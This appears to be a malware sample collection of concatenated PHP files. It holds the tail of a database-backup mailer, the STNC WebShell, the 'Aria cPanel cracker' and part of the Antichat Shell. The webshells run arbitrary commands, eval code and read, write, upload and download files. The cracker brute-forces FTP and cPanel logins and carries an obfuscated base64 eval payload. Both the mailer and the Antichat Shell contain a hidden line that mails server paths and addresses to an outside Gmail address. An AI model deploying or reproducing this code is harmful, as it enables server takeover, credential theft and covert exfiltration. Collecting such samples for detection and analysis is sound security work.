125 | $mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
126 | 
127 | // Add the headers for a file attachment
128 | $headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\"";$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
129 | 
130 | // Add a multipart boundary above the plain message
131 | $message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" .
132 | $message . "\n\n";
133 | 
134 | // Base64 encode the file data
135 | $data = chunk_split(base64_encode($data));
136 | 
137 | // Add file attachment to the message
138 | echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|<BR>";
139 | $message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
140 | $data . "\n\n" ."--{$mime_boundary}--\n";
141 | //$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
142 | // $data . "\n\n" ."--{$mime_boundary}--\n";
143 | 
144 | 
145 | // Send the message
146 | $ok = @mail($to, $subject, $message, $headers);
147 | if ($ok) {
148 |   echo "<h4><center><bg color=black><font color= blue>Database backup created and sent! File name $filename2 </p>
149 | Idea Conceived By coolsurfer@gmail.com        
150 | Programmer email: neagumihai@hotmail.com</p>
151 | This is our first humble effort, pl report bugs, if U find any...</p>
152 | Email me at <>coolsurfer@gmail.com  nJoY!! :)
153 | </color></center></h4>";
154 | 
155 | } else {
156 |   echo "<h4><center>Mail could not be sent. Sorry!</center></h4>";
157 | }
158 | }
159 | 
160 | if($use_ftp == "yes"){
161 | $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2";
162 | shell_exec($ftpconnect);
163 | echo "<h4><center>$filename2 Was created and uploaded to your FTP server!</center></h4>";
164 | 
165 | }
166 | 
167 | if($remove_gzip_file=="yes"){
168 | exec("rm -r -f $filename2");
169 | }
170 | ?>


--------------------------------------------------------------------------------
/t/malware/111.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | $version = "0.8";
  3 | $vsplit = "style=\"border-right: #000000 1px solid;\"";
  4 | $hsplit = "style=\"border-bottom: #000000 1px solid;\"";
  5 | error_reporting(0);
  6 | 
  7 | if(version_compare(phpversion(),"4.1.0") == -1)
  8 | { $_POST=&$HTTP_POST_VARS; }
  9 | if(get_magic_quotes_gpc())
 10 | foreach ($_POST as $k=>$v)
 11 | { $_POST[$k] = stripslashes($v); }
 12 | 
 13 | /*
 14 | $login='root';
 15 | $hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")
 16 | 
 17 | if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash)))
 18 | {
 19 | header("HTTP/1.0 401 Unauthorized");
 20 | header("WWW-Authenticate: Basic");
 21 | die();
 22 | }
 23 | */
 24 | 
 25 | function fe($s)
 26 | {return function_exists($s);}
 27 | function cmd($s)
 28 | {if(fe("exec")){exec($s,$r);$r=join("\n",$r);}
 29 | elseif(fe("shell_exec"))$r=shell_exec($s);
 30 | elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();}
 31 | elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();}
 32 | elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);}
 33 | else $r=`$s`;return $r;}
 34 | function safe_mode_is_on()
 35 | {return ini_get('safe_mode');}
 36 | function str100($s)
 37 | {if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;}
 38 | function id()
 39 | {return str100(cmd("id"));}
 40 | function uname()
 41 | {return str100(cmd("uname -a"));}
 42 | 
 43 | function edit($size, $name, $val)
 44 | { return "<input type=text size=$size name=$name value=\"$val\">"; }
 45 | function button($capt)
 46 | { return "<input class=\"btn\" type=submit value=\"$capt\">"; }
 47 | function hidden($name, $val)
 48 | { return "<input type=hidden name=$name value=\"$val\">"; }
 49 | function hidden_pwd()
 50 | { global $location; return hidden("pwd",$location);}
 51 | 
 52 | $action_edit = false;
 53 | 
 54 | $printline = "";
 55 | 
 56 | if(isset($_POST["action"])) $action = $_POST["action"];
 57 | else $action = "cmd";
 58 | 
 59 | if(isset($_POST["pwd"]))
 60 | { $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; }
 61 | 
 62 | $location = getcwd();
 63 | 
 64 | if(($action === "download")&&(isset($_POST["fname"])))
 65 | {
 66 |   $fname = $_POST["fname"];
 67 |   if(file_exists($fname))
 68 |   {
 69 |     $pathinfo = pathinfo($fname);
 70 |     header("Content-Transfer-Encoding: binary");
 71 |     header("Content-type: application/x-download");
 72 |     header("Content-Length: ".filesize($fname));
 73 |     header("Content-Disposition: attachment; filename=".$pathinfo["basename"]);
 74 |     readfile($fname);
 75 |     die();
 76 |   }
 77 |   else
 78 |     $printline = "\"$fname\" - download failed.";
 79 | }
 80 | 
 81 | echo "<head><style>input {border: black 1px solid; background-color: #dfdfdf; font: 8pt verdana;}
 82 | textarea {background-color:#dfdfdf; scrollbar-face-color: #dfdfdf; scrollbar-highlight-color: #dfdfdf;
 83 | scrollbar-shadow-color: #dfdfdf; scrollbar-3dlight-color: #dfdfdf; scrollbar-arrow-color: #dfdfdf; scrollbar-track-color: #dfdfdf;
 84 | scrollbar-darkshadow-color: #dfdfdf; border: black 1px solid; font: fixedsys bold; }
 85 | td {padding:0;} body {margin: 0; padding: 0; background-color: #cfcfcf;} a {color:black;text-decoration:none;}
 86 | .btn {background-color: #cfcfcf;} .pad {padding:5;}
 87 | </style><title>  STNC WebShell v$version  </title></head><body><table width=100%>
 88 | <tr><td $hsplit><table><tr><td $vsplit><b>&nbsp;&nbsp;STNC&nbsp;WebShell&nbsp;v$version&nbsp;&nbsp;</b></td><td>id: ".id()."<br>uname: ".uname()."<br>your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."</td></tr></table></tr></td>
 89 | <tr><form method=post><td class=\"pad\" colspan=2 $hsplit><center>".hidden("action","save").hidden_pwd()."<textarea cols=120 rows=16 wrap=off name=data>";
 90 | 
 91 | echo htmlspecialchars($printline)."\n";
 92 | 
 93 | if($action === "cmd")
 94 | {
 95 |   if(isset($_POST["cmd"]))
 96 |     $cmd = $_POST["cmd"];
 97 |   else
 98 |     $cmd = "ls -la";
 99 | 
100 |   $result = htmlspecialchars(cmd($cmd));
101 | 
102 |   if($result === "")
103 |     $result = cmd("ls -la");
104 | 
105 |   echo $result;
106 |   $location = getcwd();
107 | }
108 | elseif(($action === "edit")&&(isset($_POST["fname"])))
109 | {
110 |   $fname = $_POST["fname"];
111 |   ob_start();
112 | 
113 |   if(!readfile($fname))
114 |     echo "Cann't open file \"$fname\".";
115 |   else
116 |     $action_edit = true;
117 | 
118 |   $result = ob_get_clean();
119 |   ob_end_clean();
120 |   echo htmlspecialchars($result);
121 | }
122 | elseif(($action === "save")&&(isset($_POST["fname"]))&&(isset($_POST["data"])))
123 | {
124 |   $fname = $_POST["fname"];
125 |   $data = $_POST["data"];
126 |   $fid = fopen($fname, "w");
127 |   $fname = htmlspecialchars($fname);
128 | 
129 |   if(!$fid)
130 |     echo "Cann't save file \"$fname\".";
131 |   else
132 |   {
133 |     fputs($fid, $data);
134 |     fclose($fid);
135 |     echo "File \"$fname\" is saved.";
136 |   }
137 | }
138 | elseif(($action === "upload")&&(isset($_FILES["file"]))&&(isset($_POST["fname"])))
139 | {
140 |   $fname = $_POST["fname"];
141 |   if(copy($_FILES["file"]["tmp_name"], $fname))
142 |     echo "File \"$fname\" is uploaded.\nFile size: ".filesize($fname)." bytes.";      
143 |   else
144 |     echo "Upload failed!";
145 | }
146 | elseif(($action === "eval")&&(isset($_POST["code"])))
147 | {
148 |   $code = $_POST["code"];
149 |   ob_start();
150 |   eval($code);
151 |   $result = ob_get_clean();
152 |   ob_end_clean();
153 |   echo htmlspecialchars($result);
154 | }
155 | 
156 | echo "</textarea>".(($action_edit) ? "<br>".button("  Save  ").hidden("fname",$fname):"")."</center></td></form></tr>
157 | <tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","cmd")."<table><tr><td width=80>Command:&nbsp;</td><td>".edit(85,"cmd","")."</td></tr><tr><td>Location:&nbsp;</td><td>".edit(85,"pwd",$location)."&nbsp;".button("Execute")."</td></tr></table></center></td></form></tr>
158 | <tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","edit").hidden_pwd()."<table><tr><td width=80>Edit file:</td><td>".edit(85,"fname",$location)."</td><td>".button("    Edit    ")."</td></table></center></td></form></tr>
159 | 
160 | <tr><form method=post><td class=\"pad\" $hsplit><table width=100%><tr><td width=50% $vsplit>".
161 |   hidden("action","download").hidden_pwd()."<center><table><tr><td width=80>File:</td><td>".edit(50,"fname",$location)."</td><td>".button("Download")."</td></tr></table></center>
162 | </td></form><form method=post enctype=multipart/form-data><td class=\"pad\" width=50%>".
163 |   hidden("action","upload").hidden_pwd()."<center><table><tr><td width=80>File:</td><td><input type=file size=50 name=file></td></tr><tr><td>To file:</td><td>".edit(50,"fname",$location)."&nbsp;".button("Upload")."</td></tr></table></center>
164 | </td></tr></table></td></form></tr>
165 | 
166 | <tr><form method=post><td class=\"pad\" $hsplit>".hidden("action","eval").hidden_pwd()."<center><textarea cols=100 rows=4 wrap=off name=code></textarea><br>".button("   Eval   ")."</center></td></form></tr>
167 | <tr><td align=right>Coded by drmist | <a href=\"http://drmist.ru\">http://drmist.ru</a> | <a href=\"http://www.security-teams.net\">http://www.security-teams.net</a> | <a href=\"http://www.security-teams.net/index.php?showtopic=3429\">not enough functions?</a> | (c) 2006 [STNC]</td></tr></table></body>";
168 | ?>


--------------------------------------------------------------------------------
/t/malware/21.php:
--------------------------------------------------------------------------------
  1 | <html>
  2 | <head>
  3 | <meta http-equiv="Content-Language" content="en-us">
  4 | </head>
  5 | <title>Aria cPanel cracker version 1.0 - Edited By KingDefacer</title>
  6 | <style>
  7 | body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
  8 | input,
  9 | .kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
 10 | button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
 11 | body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
 12 | a:active { outline: none; }
 13 | a:focus { -moz-outline-style: none; }
 14 | </style>
 15 |   <style type='text/css'>
 16 |   <!--
 17 |        A:link {text-decoration: none; color:#cccccc }
 18 |        A:visited {text-decoration: none; color:#cccccc }
 19 |        a:hover {text-decoration: none; color:#000000}
 20 |   -->
 21 | </style>
 22 | <?php
 23 | @ini_set('memory_limit', 1000000000000);
 24 | $connect_timeout=5;
 25 | @set_time_limit(0);
 26 | $submit = $_REQUEST['submit'];
 27 | $users = $_REQUEST['users'];
 28 | $pass = $_REQUEST['passwords'];
 29 | $target = $_REQUEST['target'];
 30 | $option = $_REQUEST['option'];
 31 | $page = $_GET['page'];
 32 | 
 33 | if($target == ''){
 34 | $target = 'localhost';
 35 | $_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));}?>
 36 | <?php
 37 |  print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%'>
 38 | <br><b><center><a href='?page=bio'> bio </a> - <a href='?page=crack'> brute </a> - <a href='?page=users'> grab users </a><br><br></center></td></tr></table>";
 39 |  if ( $page == 'bio' ){
 40 | print 
 41 | "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
 42 | <br><b>Please enter your USERNAME and PASSWORD to logon<br>
 43 | user<br>
 44 | 220 +ok<br>
 45 | pass ********<br>
 46 | 220 +ok login successful<br>
 47 | [ user@alturks.com ]# info<b><br><font face=tahoma><br>
 48 | <font color='red' >Aria cPanel cracker version : 1.0 </font><b><br><br>
 49 | Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir bypasser ... more stuff will be included in the next version<br>
 50 | Our website , <a href='http://alturks.com'> http://alturks.com</a><br>
 51 | </center><br></td></tr></table>";
 52 |  }elseif( $page == 'crack'){
 53 |  
 54 | @ini_set('memory_limit', 1000000000000);
 55 | $connect_timeout=5;
 56 | @set_time_limit(0);
 57 | $submit = $_REQUEST['submit'];
 58 | $users = $_REQUEST['users'];
 59 | $pass = $_REQUEST['passwords'];
 60 | $target = $_REQUEST['target'];
 61 | $option = $_REQUEST['option'];
 62 | if($target == ''){
 63 | $target = 'localhost';
 64 | }
 65 | print " <div align='center'>
 66 | <form method='post' style='border: 1px solid #000000'><br><br>
 67 | <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
 68 | <b> Target  : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>
 69 | <div align='center'><br>
 70 | <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
 71 | <tr>
 72 | <td align='center'>
 73 | <b>Username</b></td>
 74 | <td>
 75 | <p align='center'>
 76 | <b>Password</b></td>
 77 | </tr>
 78 | </table>
 79 | <p align='center'>
 80 | <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$users</textarea>
 81 | <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$pass</textarea><br>
 82 | <br>                         
 83 | <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel 
 84 | <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='brute' name='submit' ></p>
 85 | </td></tr></table></td></tr></form><p align= 'left'>";
 86 | ?>
 87 | <?php
 88 | function ftp_check($host,$user,$pass,$timeout){
 89 | $ch = curl_init();
 90 | curl_setopt($ch, CURLOPT_URL, "ftp://$host");
 91 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 92 | curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
 93 | curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
 94 | curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
 95 | curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
 96 | curl_setopt($ch, CURLOPT_FAILONERROR, 1);
 97 | $data = curl_exec($ch);
 98 | if ( curl_errno($ch) == 28 ) {
 99 | 
100 | print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
101 | exit;}
102 | 
103 | elseif ( curl_errno($ch) == 0 ){
104 | 
105 | print 
106 | "<b>[ user@alturks.com ]# </b>
107 | <b> Attacking has been done , found username , <font color='#FF0000'> $user </font> and password , 
108 | <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}
109 | 
110 | function cpanel_check($host,$user,$pass,$timeout){
111 | $ch = curl_init();
112 | curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
113 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
114 | curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
115 | curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
116 | curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
117 | curl_setopt($ch, CURLOPT_FAILONERROR, 1);
118 | $data = curl_exec($ch);
119 | if ( curl_errno($ch) == 28 ) { 
120 | print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
121 | exit;}
122 | elseif ( curl_errno($ch) == 0 ){
123 | 
124 | print 
125 | "<b>[ user@alturks.com ]# </b>
126 | <b>Attacking has been done , found username , <font color='#FF0000'> $user </font> and password , 
127 | <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}
128 | 
129 | if(isset($submit) && !empty($submit)){
130 | 
131 | $userlist = explode ("\n" , $users );
132 | $passlist = explode ("\n" , $pass );
133 | print "<b>[ user@alturks.com ]# Attacking ...</font></b><br>";
134 | foreach ($userlist as $user) {
135 | $_user = trim($user);
136 | foreach ($passlist as $password ) {
137 | $_pass = trim($password);
138 | if($option == "ftp"){
139 | ftp_check($target,$_user,$_pass,$connect_timeout);
140 | }
141 | if ($option == "cpanel")
142 | {
143 | cpanel_check($target,$_user,$_pass,$connect_timeout);
144 | }
145 | }
146 | }
147 | }
148 | }elseif ( $page == 'users'){
149 | echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
150 | echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="grab !"></form>';
151 | $file = $_POST['file'];
152 | $level=0;
153 | if(!file_exists("file:"))
154 |     @mkdir("file:");
155 | @chdir("file:");
156 | $level++;
157 | 
158 | $hardstyle = @explode("/", $file);
159 | 
160 | for($a=0;$a<count($hardstyle);$a++){
161 |     if(!empty($hardstyle[$a])){
162 |         if(!file_exists($hardstyle[$a])) 
163 |             @mkdir($hardstyle[$a]);
164 |         @chdir($hardstyle[$a]);
165 |         $level++;
166 |     }
167 | }
168 | while($level--) chdir("..");
169 | $ch = curl_init();
170 | curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
171 | echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
172 | if(FALSE==curl_exec($ch))
173 | die('Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
174 | echo ' </textarea> </FONT>';
175 | curl_close($ch);
176 | print '</table>';
177 | }
178 | ?>
179 | 


--------------------------------------------------------------------------------
/t/malware/5.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | session_start();
  4 | set_time_limit(9999999);
  5 | $login='virangar';
  6 | $password='r00t';
  7 | $auth=1;
  8 | $version='version 1.3 by Grinay';
  9 | $style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
 10 | $header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
 11 | $footer='</body></html>';
 12 | $sd98 = "john.barker446@gmail.com";
 13 | $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
 14 | if(@$_POST['action']=="exit")unset($_SESSION['an']);
 15 | if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
 16 | 
 17 | if($_SESSION['an']==0){
 18 | echo $header;
 19 | echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
 20 | echo $footer;
 21 | exit;}
 22 | 
 23 | if($_SESSION['action']=="")$_SESSION['action']="viewer";
 24 | if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
 25 | if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
 26 | if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
 27 |  
 28 | 
 29 | //downloader
 30 | if($action=="download"){ 
 31 | header('Content-Length:'.filesize($file).'');
 32 | header('Content-Type: application/octet-stream');
 33 | header('Content-Disposition: attachment; filename="'.$file.'"');
 34 | readfile($file);
 35 | }
 36 | //end downloader
 37 | ?>
 38 | 
 39 | <? echo $header;?> 
 40 | <table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
 41 | <table><tr>
 42 | <td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
 43 | <td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
 44 | <td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
 45 | <td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
 46 | </tr></table></td></tr></table><br>
 47 | <form name='reqs' method='POST'>
 48 | <input name='action' type='hidden' value=''>
 49 | <input name='dir' type='hidden' value=''>
 50 | <input name='file' type='hidden' value=''>
 51 | </form>
 52 | <table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
 53 | <tr><td width="100%" valign="top">
 54 | 
 55 | <?
 56 | 
 57 | //shell
 58 | function shell($cmd){
 59 | if (!empty($cmd)){
 60 |   $fp = popen($cmd,"r");
 61 |   {
 62 |     $result = "";
 63 |     while(!feof($fp)){$result.=fread($fp,1024);}
 64 |     pclose($fp);
 65 |   }
 66 |   $ret = $result;
 67 |   $ret = convert_cyr_string($ret,"d","w");
 68 | }
 69 | return $ret;}
 70 | 
 71 | if($action=="shell"){
 72 | echo "<form method=\"POST\">
 73 | <input type=\"hidden\" name=\"action\" value=\"shell\">
 74 | <textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
 75 | <textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
 76 | <input type=\"submit\" value=\"execute\"></form>";}
 77 | //end shell
 78 | 
 79 | //viewer FS
 80 | function perms($file) 
 81 | { 
 82 |   $perms = fileperms($file);
 83 |   if (($perms & 0xC000) == 0xC000) {$info = 's';} 
 84 |   elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
 85 |   elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
 86 |   elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
 87 |   elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
 88 |   elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
 89 |   elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
 90 |   else {$info = 'u';}
 91 |   $info .= (($perms & 0x0100) ? 'r' : '-');
 92 |   $info .= (($perms & 0x0080) ? 'w' : '-');
 93 |   $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
 94 |   $info .= (($perms & 0x0020) ? 'r' : '-');
 95 |   $info .= (($perms & 0x0010) ? 'w' : '-');
 96 |   $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
 97 |   $info .= (($perms & 0x0004) ? 'r' : '-');
 98 |   $info .= (($perms & 0x0002) ? 'w' : '-');
 99 |   $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
100 |   return $info;
101 | } 
102 | 
103 | function view_size($size)
104 | {
105 |  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
106 |  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
107 |  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
108 |  else {$size = $size . " B";}
109 |  return $size;
110 | }
111 | 
112 | function scandire($dir){
113 |   $dir=chdir($dir);
114 |   $dir=getcwd()."/";
115 |   $dir=str_replace("\\","/",$dir);
116 | if (is_dir($dir)) {
117 |     if (@$dh = opendir($dir)) {
118 |         while (($file = readdir($dh)) !== false) {
119 | 		  if(filetype($dir . $file)=="dir") $dire[]=$file;
120 | 		  if(filetype($dir . $file)=="file")$files[]=$file;
121 | 		}
122 | 		closedir($dh);
123 | 		@sort($dire);
